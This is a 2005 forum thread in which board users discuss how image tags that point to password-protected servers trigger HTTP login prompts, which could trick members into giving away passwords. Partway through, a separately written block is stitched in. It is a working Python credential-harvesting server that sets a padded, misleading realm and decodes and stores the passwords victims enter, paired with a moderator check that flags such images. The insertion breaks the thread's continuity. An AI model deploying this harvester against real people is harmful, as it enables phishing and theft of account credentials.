Shoutbox

(DO NOT CLICK OK!) I found a major security flaw in many boards - Printable Version

Shoutbox (https://shoutbox.menthix.net) - Tech Talk - Thread: (DO NOT CLICK OK!) I found a major security flaw in many boards (/showthread.php?tid=43637)

(DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 06:34 PM

Well I was using the official Playstation forums and someone asked me how to put an image in their signature.

I told them to use (yes - the PS forums allow html):
<img src="http://www.externalserver.com/folder/image.extension">


He, being a newbie, thought I meant to use that EXACT code. He put it in and now a java pop-up appears whenever a page with that tag is viewed :lol:.

It appears to work here, too, using the [img] tags.
[img]http://www.externalserver.com/folder/image.extension[/img] (Edited by WDZ)


This has been tested on:
Lithium (PS forums)
Mybb (these forums).



WDZ - if you get a chance you might want to fix this on the Plus! forums :rolleyes:
Chris Boulton - you may want to fix this for everyone else.


RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-25-2005 at 06:38 PM

quote:
Originally posted by blade
He put it in and now a java pop-up appears whenever a page with that tag is viewed
Uhh... it just looks like a standard HTTP login prompt... not that unusual... I've seen it here a number of times. The mods just remove any image that requires a login.

There's really no way to prevent such images from being linked to.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by KeyStorm on 04-25-2005 at 06:39 PM

I think this is somewhat impossible to fix. However, this does not cause any harm (I think), just some annoyance. :^)

Edit: Ok, unless it says, you need to log in to the board again :P

/sdoh


RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 06:42 PM

Well some newbies could click "ok" and be redirected to the site's homepage or something. It's a very up-front way of someone advertising.


And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts :dodgy:).


RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Millenium_edition on 04-25-2005 at 06:46 PM

quote:
Originally posted by blade
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts :dodgy:).
actually, it can't... if you need permission to view those, that popup will also appear.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Anubis on 04-25-2005 at 06:48 PM

quote:
Originally posted by blade

And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that
They still need login :/

quote:
Originally posted by WDZ

There's really no way to prevent such images from being linked to.
Apart from the obvious: sniffing out any provider that does them and banning hotlinking to their site from here. It wouldn't work though; one would always be missed, although it could act as "damage limitation" and decrease the odds of it happening.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-25-2005 at 06:49 PM

quote:
Originally posted by blade
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts :dodgy:).
Uhhm... no.

Click: http://shoutbox.menthix.net/images/auth.jpg

:p
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 06:49 PM

quote:
Originally posted by WDZ
quote:
Originally posted by blade
And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts :dodgy:).
Uhhm... no.

Click: http://shoutbox.menthix.net/images/auth.jpg

:p


Well it's your choice I guess :-/
And ya - I forgot about protected images :dodgy:

(and :refuck: 2u2)
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Anubis on 04-25-2005 at 06:53 PM

quote:
Originally posted by blade

Well it's your choice I guess

He said "Uhhm...No" because it wouldn't work, not because it's his choice.
You need authorisation for the server, and any file on the server. Doesn't matter if it's a .exe or .gif. You need a username and password
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 06:55 PM

quote:
Originally posted by Anubis

He said "Uhhm...No" because it wouldn't work, not because it's his choice.

I know, but there are other things he could do :P (blacklist servers for one)


quote:
Originally posted by Anubis

You need authorisation for the server, and any file on the server. Doesn't matter if it's a .exe or .gif. You need a username and password

I know - I forgot :P

RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Millenium_edition on 04-25-2005 at 07:03 PM

quote:
Originally posted by blade
<blacklist>
do you have any idea about how big the internet really is? ¬¬

edit: :$
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by KeyStorm on 04-25-2005 at 07:05 PM

quote:
Originally posted by blade
Well some newbies could click "ok" and be redirected to the site's homepage or something. It's a very up-front way of someone advertising.


And it could be fixed by limiting the use of image tags to "gif" "jpeg" "jpg" "bmp" "png" or something like that (though that would mess with the random image scripts :dodgy:).

A very simple HTTP policy could redirect that internally (no apparent URL change) to a script that could easily read everything you put into the fields. :rolleyes:

Care to say any attempt at tricking people into this should be considered an attempt to hack the board, and a permanent ban would be reasonable :P
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by .blade// on 04-25-2005 at 07:12 PM

quote:
Originally posted by KeyStorm
Care to say any try of tricking people into this should be considered as a try to hack the board and a permanent ban should be reasonable :P

Hahaha - good call.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by saralk on 04-26-2005 at 05:35 PM

i guess it could be used in a very dodgy way, by making people think that they need to enter their username and password again. :dodgy:


RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-26-2005 at 05:56 PM

quote:
Originally posted by saralk
i guess it could be used in a very dodgy way, by making people think that they need to enter their username and password again. :dodgy:
Yeah, but at least the prompt tells you what server you'd be sending the data to. :-/ Of course, some people without much web knowledge/experience could be fooled.

We'll simply remove any image that requires a login, as there is no way to stop them from being used in the [img] tags.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by John Anderton on 04-26-2005 at 07:19 PM

quote:
Originally posted by WDZ
Click: http://shoutbox.menthix.net/images/auth.jpg
I have that exact same script .... well, that's what I use to protect my private pic gallery :P
What's a username and password that will actually work there, dz?
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by KeyStorm on 04-26-2005 at 07:24 PM

quote:
Originally posted by WDZ
quote:
Originally posted by saralk
i guess it could be used in a very dodgy way, by making people think that they need to enter their username and password again. :dodgy:
Yeah, but at least the prompt tells you what server you'd be sending the data to. :-/ Of course, some people without much web knowledge/experience could be fooled.

We'll simply remove any image that requires a login, as there is no way to stop them from being used in the [img] tags.


Oh, noes, DZ, the Auth Realm can be freely set to anything you want. So there's no way to know where it comes from. Actually, you can't tell what image caused it, unless you try them separately.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-26-2005 at 07:28 PM

quote:
Originally posted by John Anderton
I have that exact same script
:lol: No you don't... it's just a standard HTTP login prompt.
quote:
Whats a username and password that will actually work there dz ?
There isn't one... it's only an example.
quote:
Originally posted by KeyStorm
Oh, noes, DZ, the Auth Realm can be freely set to anything you want.
Well, Opera shows me the server name (msghelp.net) in addition to the realm. Other browsers don't? :-/
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by John Anderton on 04-26-2005 at 07:43 PM

quote:
Originally posted by WDZ
No you don't... it's just a standard HTTP login prompt.
I thought it was an actual script :P I was too lazy to read the whole thread :-)
I was referring to a PHP script that asks you for a name and password and only allows access to a file in which it was included when both are correct.
quote:
Originally posted by WDZ
There isn't one... it's only an example.
Same answer as above ..... you're dodgy :P
quote:
Originally posted by WDZ
Well, Opera shows me the server name (msghelp.net) in addition to the realm. Other browsers don't? :-/
Firefox does :P It says
quote:
Originally posted by Dz's dodgy script (http login prompt)
Enter username and password for "Oh noes!!!" at http://shoutbox.menthix.net

And behind the page it says :refuck:
You could have at least taken the liberty of putting the actual image there :-/
<img src="http://shoutbox.menthix.net/images/smilies/refuck.gif" alt="Refuck Emote">

* John Anderton is sleepy and just hopes there aren't any typos there ....
if there are, correct them yourself ...

RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by KeyStorm on 04-26-2005 at 08:08 PM

Ok, instead of "Oh noes!!" put

code:
"Oh noes!!

"

or

code:
"Oh noes!!!                                "
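
The two points made above, KeyStorm's earlier remark that the protected image can be backed by a script that simply reads whatever is typed into the login box, and WDZ's plan to remove any [img] that requires a login, can both be shown in working code. The following is an added example written for this page, not code from the thread, from MyBB or from Lithium. It runs a throwaway HTTP server on localhost that guards one "image" with HTTP Basic authentication, sets the realm to a padded, misleading string of the kind discussed in this post, and records the credentials a browser would send back after the user clicks OK. It also includes a moderator-side check that fetches every [img] URL in a post without credentials and flags the ones answering 401. The hostnames, paths, realm text and credentials are all made up; the [img] regex is a simplification of the board's real parser, and it goes a little beyond the thread by serving both a protected and an unprotected `.gif` from the same server to show why filtering on file extension does not help.

```python
"""Added example: a rogue "image" server that harvests HTTP Basic credentials,
plus a moderator check that flags [img] URLs that trigger a login prompt.
Everything here (hosts, paths, realm text, credentials) is constructed."""
import base64
import re
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# The realm is free text chosen by the server. Padding pushes the honest part
# out of view in a narrow dialog; only the first sentence is likely to be read.
REALM = "Please re-enter your forum password" + " " * 60 + "(not the forum)"

# Smallest valid GIF (1x1 transparent), so the tag renders once "logged in".
TINY_GIF = base64.b64decode(
    "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"
)

# Credentials the rogue server has collected, as (username, password).
HARVESTED = []


class RogueImageHandler(BaseHTTPRequestHandler):
    """/protected/* answers 401 until Basic credentials arrive and records
    them; /public/* is served openly. Both paths end in .gif on purpose."""

    def do_GET(self):
        self._respond(send_body=True)

    def do_HEAD(self):
        self._respond(send_body=False)

    def _respond(self, send_body):
        protected = self.path.startswith("/protected/")
        auth = self.headers.get("Authorization", "")
        if protected and not auth.startswith("Basic "):
            # No credentials yet: this challenge is what makes the browser
            # pop the login box. The realm string is attacker-controlled.
            self.send_response(401)
            self.send_header("WWW-Authenticate", f'Basic realm="{REALM}"')
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        if protected:
            # The browser retried with whatever the user typed: decode and keep.
            try:
                raw = base64.b64decode(auth[6:]).decode("utf-8", "replace")
            except ValueError:
                raw = ""
            user, _, password = raw.partition(":")
            HARVESTED.append((user, password))
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(TINY_GIF)))
        self.end_headers()
        if send_body:
            self.wfile.write(TINY_GIF)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_rogue_server():
    """Start the server on an ephemeral localhost port; return its base URL."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), RogueImageHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}"


# Simplified [img] tag matcher (hypothetical; not the board's real parser).
IMG_TAG = re.compile(r"\[img\](.+?)\[/img\]", re.IGNORECASE | re.DOTALL)


def find_login_prompting_images(post_text, timeout=3):
    """Moderator check: HEAD every [img] URL without credentials and return
    (url, realm) for each one that answers 401, i.e. would pop a login box."""
    flagged = []
    for url in (u.strip() for u in IMG_TAG.findall(post_text)):
        req = urllib.request.Request(url, method="HEAD")
        try:
            urllib.request.urlopen(req, timeout=timeout).close()
        except urllib.error.HTTPError as err:
            if err.code == 401:
                challenge = err.headers.get("WWW-Authenticate", "")
                match = re.search(r'realm="([^"]*)"', challenge)
                flagged.append((url, match.group(1) if match else ""))
        except (urllib.error.URLError, OSError):
            pass  # unreachable hosts are a different problem
    return flagged


def victim_clicks_ok(url, username, password):
    """Simulate the user filling in the prompt: resend the request with an
    Authorization: Basic header, exactly as a browser does after OK."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    with urllib.request.urlopen(req, timeout=3) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    base = start_rogue_server()
    post = f"sig: [img]{base}/protected/photo.gif[/img] [IMG]{base}/public/logo.gif[/IMG]"
    print("flagged:", find_login_prompting_images(post))
    victim_clicks_ok(f"{base}/protected/photo.gif", "blade", "hunter2")
    print("harvested:", HARVESTED)
```

Two things worth noting from running it. The credentials go to the image server's origin, never to the forum, which is why the board cannot see or stop the exchange and why the prompt's server name (when the browser shows it) is the only honest signal the user gets; the realm is not. And the moderator check is point-in-time only: a server that answers 200 when the post is reviewed can be switched to 401 afterwards, so removing flagged images on sight, as WDZ says, still has to be paired with re-checking or with reports from users. Current browsers also tend to suppress or clearly label authentication prompts raised by cross-origin subresources such as images, which blunts this particular trick compared with the 2005 browsers discussed here.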

RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by John Anderton on 04-27-2005 at 11:46 AM

quote:
Originally posted by KeyStorm
Ok, instead of "Oh noes!!" put
Sorry, I miss the point .... why? What difference does that make, KS?
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Guido on 04-27-2005 at 03:12 PM

quote:
Originally posted by John Anderton
quote:
Originally posted by KeyStorm
Ok, instead of "Oh noes!!" put
Sorry i miss the point .... why ?? what difference does that make KS ??
That it might hide the real URL in the alert popup.
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by WDZ on 04-27-2005 at 03:13 PM

I'd hope that browser developers would think of that and limit the length and/or trim whitespace... :-/


RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Guido on 04-27-2005 at 03:17 PM

quote:
Originally posted by WDZ
I'd hope that browser developers would think of that and limit the length and/or trim whitespace... :-/
Sometimes yes, sometimes no.

Probably not with whitespace, but I've seen lots of times other stuff being used to lengthen the name artificially... such as "OH NOES! CLICK OK TO CONTINUE THIS IS A SAFE PAGE. YOU CAN WIN MONEY IF YOU CLICK NEXT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! WDZ IS DA LAZYN355!" ETC. :P
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Concord Dawn on 04-27-2005 at 04:20 PM

quote:
Originally posted by Guido
quote:
Originally posted by WDZ
I'd hope that browser developers would think of that and limit the length and/or trim whitespace... :-/
Sometimes yes, sometimes no.

Probably not with whitespace, but I've seen lots of times other stuff being used to lengthen the name artificially... such as "OH NOES! CLICK OK TO CONTINUE THIS IS A SAFE PAGE. YOU CAN WIN MONEY IF YOU CLICK NEXT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! WDZ IS DA LAZYN355!" ETC. :P

:refuck:

How about just doing as KeyStorm said? Permanently banning all users that try that? :P
RE: (DO NOT CLICK OK!) I found a major security flaw in many boards by Guido on 04-27-2005 at 06:50 PM

quote:
Originally posted by Chaotic_Shield
How about kjust doing as KeyStorm said? Permanently banning all users that try that?
Which is exactly what is being done currently. Not banning, since it was never meant as a form of spam, more like a mistake, but if it is used with intent to spam, be sure it will be taken care of.